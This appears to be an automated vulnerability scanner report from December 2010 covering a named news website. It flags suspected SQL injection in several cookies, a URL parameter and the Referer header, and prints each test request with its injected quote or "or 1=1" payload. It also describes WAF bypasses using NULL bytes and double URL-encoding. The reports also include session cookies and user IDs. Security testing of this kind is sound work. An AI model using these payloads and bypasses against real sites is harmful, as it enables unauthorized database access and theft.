GET /giants/ci_16793528?source=rss%2527%2527 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/giants/ci_16793528?s ...[SNIP]...
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currBrandCheck cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /high-school-sports/ci_16780570?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00'; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16780570?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews%00''; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]...
1.233. http://www.mercurynews.com/high-school-sports/ci_16780570 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.mercurynews.com
Path:
/high-school-sports/ci_16780570
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /high-school-sports/ci_16780570?1%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gators get schooled by Country Day in championship match but surprised many by advancing so ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16780570?1%2527%2527=1 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /high-school-sports/ci_16781152?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Hungry Rams fill their appetite in a 47-14 triumph.'><meta name="keywords" conten ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. The payloads 19376229'%20or%201%3d1--%20 and 19376229'%20or%201%3d2--%20 were each submitted in the JSESSIONID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /high-school-sports/ci_16781473 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA19376229'%20or%201%3d1--%20; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Piedmont Hills receivers come through to help the program win its first CCS title.'><meta name="keywords" content="SportsRaiders SportsGiants SportsAthletics cal santaclara"/><title>CCS Division I football final: Piedmont Hills defeats Homestead - San Jose Mercury News</title><script language="JavaScript"> document.write('<link rel="shortcut icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); document.write('<link rel="icon" href="http://extras.mnginteractive.com/live/media/favIcon/mercury/favicon.ico" type="image/x-icon">'); </script>
<script src="http://extras.mnginteractive.com/live/js/Brightcove/MercuryNews/MobileCompatibility.js"></script> <Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "mercurynews.Sports.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781473 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA19376229'%20or%201%3d2--%20; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/high-school-sports/ci_16781473?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 07:24:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 07:24:06 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 453
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/high-school-sports/ci_16781473?nclick_check=1&forced=true">here</a>.</p> <hr> <address>Apache/2.0.52 (Red Hat) Server at www.mercurynews.com Port 80</address> </body></html>
The JSESSIONID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSESSIONID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /high-school-sports/ci_16781501?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA'; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781501?source=rss HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA''; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The source parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the source parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /high-school-sports/ci_16781501?source=rss%00' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16781501?source=rss%00'' HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /high-school-sports/ci_16792321 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Santa Clara Valley high school results'><meta name="keywords" content="SportsRaiders Sports ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /high-school-sports/ci_16792321 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/high-school-sports/c ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /nation-world/ci_16796747 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='DUBLIN—Ireland must endure the toughest cuts and tax hikes in its history as an unavo ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]... <p>Lenihan conceded that a failure to secure the EU-IMF bailout would have raised "serious doubts" about Ireland's ability to pay its bills from mid-2011 onward.<span fd-type="end" fd-id="default"> ...[SNIP]...
Request 2
GET /nation-world/ci_16796747 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=%2527%2527
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/nation-world/ci_1679 ...[SNIP]...
The UserID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /nation-world/ci_16797757 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI'; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
